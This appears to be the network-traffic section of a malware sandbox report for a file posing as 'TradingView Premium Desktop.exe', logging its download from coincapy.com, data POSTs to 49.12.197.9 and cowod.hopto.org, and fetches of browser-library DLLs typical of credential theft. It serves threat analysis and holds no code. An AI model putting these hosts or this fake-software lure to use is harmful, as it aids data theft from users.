                                          Last-Modified: Thu, 03 Oct 2024 18:47:25 GMT
                                          Expires: Thu, 10 Oct 2024 18:47:24 GMT
                                          Etag: "d859838c13fcdd995abf47dc8580cac76787ee82"
                                          Cache-Control: max-age=604034,s-maxage=1800,public,no-transform,must-revalidate
                                          X-CCACDN-Proxy-ID: mcdpinlb1
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 485
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce021b4efea76d5-LHR
                                        • flag-us
                                          GET
                                          http://crl.comodoca.com/COMODOCodeSigningCA2.crl
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /COMODOCodeSigningCA2.crl HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: crl.comodoca.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:23:49 GMT
                                          Content-Type: application/pkix-crl
                                          Content-Length: 75316
                                          Connection: keep-alive
                                          Last-Modified: Sat, 05 Oct 2024 01:39:17 GMT
                                          Expires: Sat, 12 Oct 2024 01:39:17 GMT
                                          Etag: "17c27a092b63b8718147add665dbd85cd3700d6f"
                                          Cache-Control: max-age=599909,s-maxage=3600,public,no-transform,must-revalidate
                                          X-CCACDN-Proxy-ID: mcdpinlb1
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 2927
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce021b61fe06329-LHR
                                        • flag-de
                                          GET
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET / HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:23:59 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • flag-de
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----HJJECBKKECFIEBGCAKJK
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 256
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:00 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • flag-de
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFI
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 331
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:01 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • flag-de
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKF
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 331
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:02 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • flag-de
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFH
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 332
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:03 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • flag-de
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----CGDGHCBGDHJJKECAECBA
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 4817
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:04 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • flag-de
                                          GET
                                          https://49.12.197.9/sqlp.dll
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET /sqlp.dll HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:04 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 2459136
                                          Connection: keep-alive
                                          Last-Modified: Saturday, 05-Oct-2024 20:24:04 GMT
                                          Cache-Control: no-store, no-cache
                                          Accept-Ranges: bytes
                                        • flag-de
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKF
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 437
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:07 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • flag-de
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----BAECFHJEBAAFIEBGHIIE
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 437
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:09 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • flag-de
                                          GET
                                          https://49.12.197.9/freebl3.dll
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET /freebl3.dll HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:09 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 685392
                                          Connection: keep-alive
                                          Last-Modified: Saturday, 05-Oct-2024 20:24:09 GMT
                                          Cache-Control: no-store, no-cache
                                          Accept-Ranges: bytes
                                        • flag-de
                                          GET
                                          https://49.12.197.9/mozglue.dll
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET /mozglue.dll HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:10 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 608080
                                          Connection: keep-alive
                                          Last-Modified: Saturday, 05-Oct-2024 20:24:10 GMT
                                          Cache-Control: no-store, no-cache
                                          Accept-Ranges: bytes
                                        • flag-de
                                          GET
                                          https://49.12.197.9/msvcp140.dll
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET /msvcp140.dll HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:12 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 450024
                                          Connection: keep-alive
                                          Last-Modified: Saturday, 05-Oct-2024 20:24:12 GMT
                                          Cache-Control: no-store, no-cache
                                          Accept-Ranges: bytes
                                        • flag-de
                                          GET
                                          https://49.12.197.9/softokn3.dll
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET /softokn3.dll HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:12 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 257872
                                          Connection: keep-alive
                                          Last-Modified: Saturday, 05-Oct-2024 20:24:12 GMT
                                          Cache-Control: no-store, no-cache
                                          Accept-Ranges: bytes
                                        • flag-de
                                          GET
                                          https://49.12.197.9/vcruntime140.dll
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET /vcruntime140.dll HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:14 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 80880
                                          Connection: keep-alive
                                          Last-Modified: Saturday, 05-Oct-2024 20:24:14 GMT
                                          Cache-Control: no-store, no-cache
                                          Accept-Ranges: bytes
                                        • flag-de
                                          GET
                                          https://49.12.197.9/nss3.dll
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          GET /nss3.dll HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:14 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 2046288
                                          Connection: keep-alive
                                          Last-Modified: Saturday, 05-Oct-2024 20:24:14 GMT
                                          Cache-Control: no-store, no-cache
                                          Accept-Ranges: bytes
                                        • flag-de
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHC
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 331
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:15 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • flag-de
                                          POST
                                          https://49.12.197.9/
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          49.12.197.9:443
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIID
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: 49.12.197.9
                                          Content-Length: 331
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Response
                                          HTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 05 Oct 2024 20:24:16 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                        • flag-ru
                                          POST
                                          http://cowod.hopto.org/
                                          Remote address:
                                          45.132.206.251:80
                                          Request
                                          POST / HTTP/1.1
                                          Content-Type: multipart/form-data; boundary=----FHIDAKFIJJKJJJKEBKJE
                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                          Host: cowod.hopto.org
                                          Content-Length: 2005
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                        • flag-us
                                          DNS
                                          steamcommunity.com
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          steamcommunity.com
                                          IN A
                                          Response
                                          steamcommunity.com
                                          IN A
                                          104.124.170.33
                                        • flag-us
                                          DNS
                                          33.170.124.104.in-addr.arpa
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          33.170.124.104.in-addr.arpa
                                          IN PTR
                                          Response
                                          33.170.124.104.in-addr.arpa
                                          IN PTR
                                          a104-124-170-33deploystaticakamaitechnologiescom
                                        • flag-us
                                          DNS
                                          steamcommunity.com
                                          TradingView Premium Desktop.exe
                                          Remote address:
                                          8.8.8.8:53
                                          Request
                                          steamcommunity.com
                                          IN A
                                          Response
                                          steamcommunity.com
                                          IN A
                                          104.82.234.109
                                        • flag-us
                                          GET
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.usertrust.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:26:28 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 5
                                          Connection: keep-alive
                                          X-CCACDN-Proxy-ID: mcdpinlb3
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 6446
                                          Last-Modified: Sat, 05 Oct 2024 18:39:02 GMT
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce0259869bc9601-LHR
                                        • flag-us
                                          GET
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D HTTP/1.1
                                          Cache-Control: no-cache
                                          Connection: Keep-Alive
                                          Pragma: no-cache
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: ocsp.usertrust.com
                                          Response
                                          HTTP/1.1 200 OK
                                          Date: Sat, 05 Oct 2024 20:26:28 GMT
                                          Content-Type: application/ocsp-response
                                          Content-Length: 5
                                          Connection: keep-alive
                                          X-CCACDN-Proxy-ID: mcdpinlb3
                                          X-Frame-Options: SAMEORIGIN
                                          CF-Cache-Status: HIT
                                          Age: 6446
                                          Last-Modified: Sat, 05 Oct 2024 18:39:02 GMT
                                          Accept-Ranges: bytes
                                          Server: cloudflare
                                          CF-RAY: 8ce025990a799601-LHR
                                        • flag-us
                                          GET
                                          http://crl.usertrust.com/AddTrustExternalCARoot.crl
                                          Remote address:
                                          104.18.38.233:80
                                          Request
                                          GET /AddTrustExternalCARoot.crl HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          User-Agent: Microsoft-CryptoAPI/10.0
                                          Host: crl.usertrust.com
                                          Response
                                          HTTP/1.1 404 Not Found
                                          Date: Sat, 05 Oct 2024 20:26:28 GMT
                                          Content-Length: 0
                                          Connection: keep-alive
                                          CF-Cache-Status: HIT
                                          Age: 135
                                          Server: cloudflare
                                          CF-RAY: 8ce02599cf1479ad-LHR
                                        • 172.67.154.80:443
                                          https://coincapy.com/tradingview_premium/TradingView_Premium_Desktop.zip
                                          tls, http2
                                          chrome.exe
                                          5.0MB
                                          144.2MB
                                          87977
                                          103362

                                          HTTP Request

                                          GET https://coincapy.com/tradingview_premium/TradingView_Premium_Desktop.zip

                                          HTTP Response

                                          200
                                        • 172.67.154.80:443
                                          coincapy.com
                                          tls, http2
                                          chrome.exe
                                          943 B
                                          3.1kB
                                          8
                                          6
                                        • 104.18.38.233:80
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          http
                                          1.8kB
                                          4.3kB
                                          13
                                          9

                                          HTTP Request

                                          GET http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D

                                          HTTP Response

                                          200

                                          HTTP Request

                                          GET http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D

                                          HTTP Response

                                          200

                                          HTTP Request

                                          GET http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRtl6lMY2%2BiPob4twryIF%2BFfgUdvwQUK8NGq7oOyWUqRtF5R8Ri4uHa%2FLgCEBBwnU%2F1VAjXMGAB2OqRdbs%3D

                                          HTTP Response

                                          200

                                          HTTP Request

                                          GET http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D

                                          HTTP Response

                                          200

                                          HTTP Request

                                          GET http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D

                                          HTTP Response

                                          200
                                        • 104.18.38.233:80
                                          http://crl.usertrust.com/AddTrustExternalCARoot.crl
                                          http
                                          650 B
                                          587 B
                                          8
                                          5

                                          HTTP Request

                                          GET http://crl.usertrust.com/AddTrustExternalCARoot.crl

                                          HTTP Response

                                          404

                                          HTTP Request

                                          GET http://crl.usertrust.com/AddTrustExternalCARoot.crl

                                          HTTP Response

                                          404
                                        • 104.18.38.233:80
                                          http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG%2BEAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDdUPRnAxblItVrRQ%2FwH0MO
                                          http
                                          827 B
                                          2.3kB
                                          7
                                          5

                                          HTTP Request

                                          GET http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG%2BEAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDdUPRnAxblItVrRQ%2FwH0MO

                                          HTTP Response

                                          200

                                          HTTP Request

                                          GET http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBSOJaE2H4hHYQzP74hlLuO41NG%2BEAQUHsWxLH2H2gJofCW8DAeEP7bP3vECEQDdUPRnAxblItVrRQ%2FwH0MO

                                          HTTP Response

                                          200
                                        • 104.18.38.233:80
                                          http://crl.comodoca.com/COMODOCodeSigningCA2.crl
                                          http
                                          2.7kB
                                          78.2kB
                                          46
                                          59

                                          HTTP Request

                                          GET http://crl.comodoca.com/COMODOCodeSigningCA2.crl

                                          HTTP Response

                                          200
                                        • 104.82.234.109:443
                                          steamcommunity.com
                                          tls
                                          TradingView Premium Desktop.exe
                                          2.6kB
                                          42.9kB
                                          41
                                          37
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          1.1kB
                                          2.8kB
                                          13
                                          9

                                          HTTP Request

                                          GET https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          1.4kB
                                          622 B
                                          10
                                          6

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          1.9kB
                                          2.2kB
                                          11
                                          7

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          1.7kB
                                          6.4kB
                                          14
                                          10

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          1.4kB
                                          672 B
                                          9
                                          6

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          6.1kB
                                          605 B
                                          13
                                          7

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/sqlp.dll
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          101.8kB
                                          2.6MB
                                          1907
                                          1903

                                          HTTP Request

                                          GET https://49.12.197.9/sqlp.dll

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          1.5kB
                                          565 B
                                          9
                                          6

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          2.8kB
                                          525 B
                                          12
                                          5

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/freebl3.dll
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          26.0kB
                                          707.5kB
                                          517
                                          513

                                          HTTP Request

                                          GET https://49.12.197.9/freebl3.dll

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/mozglue.dll
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          27.1kB
                                          627.9kB
                                          461
                                          455

                                          HTTP Request

                                          GET https://49.12.197.9/mozglue.dll

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/msvcp140.dll
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          16.7kB
                                          464.7kB
                                          342
                                          338

                                          HTTP Request

                                          GET https://49.12.197.9/msvcp140.dll

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/softokn3.dll
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          10.2kB
                                          267.4kB
                                          200
                                          197

                                          HTTP Request

                                          GET https://49.12.197.9/softokn3.dll

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/vcruntime140.dll
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          3.8kB
                                          84.0kB
                                          69
                                          65

                                          HTTP Request

                                          GET https://49.12.197.9/vcruntime140.dll

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/nss3.dll
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          70.8kB
                                          2.1MB
                                          1522
                                          1519

                                          HTTP Request

                                          GET https://49.12.197.9/nss3.dll

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          1.5kB
                                          2.8kB
                                          10
                                          7

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          https://49.12.197.9/
                                          tls, http
                                          TradingView Premium Desktop.exe
                                          1.4kB
                                          748 B
                                          9
                                          6

                                          HTTP Request

                                          POST https://49.12.197.9/

                                          HTTP Response

                                          200
                                        • 49.12.197.9:443
                                          tls
                                          TradingView Premium Desktop.exe
                                          114.5kB
                                          2.0kB
                                          91
                                          41
                                        • 49.12.197.9:443
                                          tls
                                          1.4kB
                                          755 B
                                          9
                                          6
                                        • 49.12.197.9:443
                                          tls
                                          1.4kB
                                          518 B
                                          8
                                          5
                                        • 45.132.206.251:80
                                          http://cowod.hopto.org/
                                          http
                                          2.5kB
                                          132 B
                                          6
                                          3

                                          HTTP Request

                                          POST http://cowod.hopto.org/
                                        • 104.82.234.109:443
                                          steamcommunity.com
                                          tls
                                          2.3kB
                                          43.0kB
                                          40
                                          38
                                        • 49.12.197.9:443
                                          tls
                                          1.0kB
                                          2.7kB
                                          11
                                          8
                                        • 49.12.197.9:443
                                          tls
                                          1.4kB
                                          622 B
                                          9
                                          6
                                        • 49.12.197.9:443
                                          tls
                                          1.5kB
                                          2.2kB
                                          10
                                          7
                                        • 49.12.197.9:443
                                          tls
                                          1.6kB
                                          6.4kB
                                          13
                                          10
                                        • 49.12.197.9:443
                                          tls
                                          1.4kB
                                          672 B
                                          9
                                          6
                                        • 49.12.197.9:443
                                          tls
                                          6.1kB
                                          525 B
                                          12
                                          5
                                        • 49.12.197.9:443
                                          tls
                                          85.2kB
                                          2.5MB
                                          1838
                                          1830
                                        • 104.124.170.33:443
                                          steamcommunity.com
                                          tls
                                          2.3kB
                                          42.9kB
                                          39
                                          37
                                        • 49.12.197.9:443
                                          tls
                                          1.0kB
                                          2.7kB
                                          11
                                          8
                                        • 49.12.197.9:443
                                          tls
                                          1.4kB
                                          622 B
                                          9
                                          6
                                        • 49.12.197.9:443
                                          tls
                                          1.5kB
                                          2.2kB
                                          10
                                          7
                                        • 49.12.197.9:443
                                          tls
                                          1.6kB
                                          6.4kB
                                          13
                                          10
                                        • 49.12.197.9:443
                                          tls
                                          1.4kB
                                          712 B
                                          9
                                          7
                                        • 49.12.197.9:443
                                          tls
                                          6.1kB
                                          645 B
                                          13
                                          8
                                        • 49.12.197.9:443
                                          tls
                                          84.8kB
                                          2.5MB
                                          1830
                                          1825
                                        • 49.12.197.9:443
                                          tls
                                          1.5kB
                                          528 B
                                          8
                                          5
                                        • 104.18.38.233:80
                                          http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEEIa8pQJhBkfUgpLxiQmp0s%3D
                                          http
                                          779 B
                                          882 B
                                          6
                                          4

